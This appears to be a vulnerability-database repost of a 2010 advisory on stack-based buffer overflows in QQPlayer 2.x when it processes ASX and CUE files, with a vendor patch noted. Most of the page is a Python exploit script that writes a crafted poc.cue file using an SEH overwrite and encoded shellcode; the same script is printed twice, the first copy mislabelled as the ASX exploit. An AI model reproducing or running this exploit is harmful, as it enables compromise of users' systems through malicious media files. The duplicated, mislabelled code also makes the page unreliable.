QQPlayer ASX和CUE文件处理缓冲区溢出漏洞
- 发表于
- Vulndb
QQPlayer ASX and CUE File Processing Buffer Overflow Vulnerabilities
发布:2010-07-21
影响:System access
状态:Vendor Patch
软件:QQPlayer 2.x
Description
Two vulnerabilities have been discovered in QQPlayer, which can be exploited by malicious people to compromise a user's system.
1) A boundary error when processing ASX files can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into opening a specially crafted ASX file.
2) A boundary error when processing CUE files can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into opening a specially crafted CUE file.
The vulnerabilities are confirmed in version 2.3.969.400p1. Other versions may also be affected.
Solution
Update to version 2.4.716.400p1.
Provided and/or discovered by
1) Li Qingshan, Information Security Engineering Center, School of Software and Microelectronics, Peking University
2) Lufeng Li, Neusoft Corporation
Original Advisory
1) http://www.exploit-db.com/exploits/14428/
2) http://www.exploit-db.com/exploits/14431/
Deep Links
Links available in Customer Area
QQPlayer asx File Processing Buffer Overflow Exploit
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
#!/usr/bin/env python ################################################################# # # Title: QQPlayer cue File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code : head = '''FILE "''' junk = "A" * 780 nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x32\x42\x61\x33\xca\x83\xc0\x10" shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o" "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41" "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK" "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01") junk_="R"*8000 foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08" payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.cue","w") fobj.write(payload) fobj.close() |
QQPlayer cue File Buffer Overflow Exploit
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
#!/usr/bin/env python ################################################################# # # Title: QQPlayer cue File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code : head = '''FILE "''' junk = "A" * 780 nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x32\x42\x61\x33\xca\x83\xc0\x10" shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o" "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41" "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK" "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01") junk_="R"*8000 foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08" payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.cue","w") fobj.write(payload) fobj.close() |
原文连接的情况下转载,若非则不得使用我方内容。
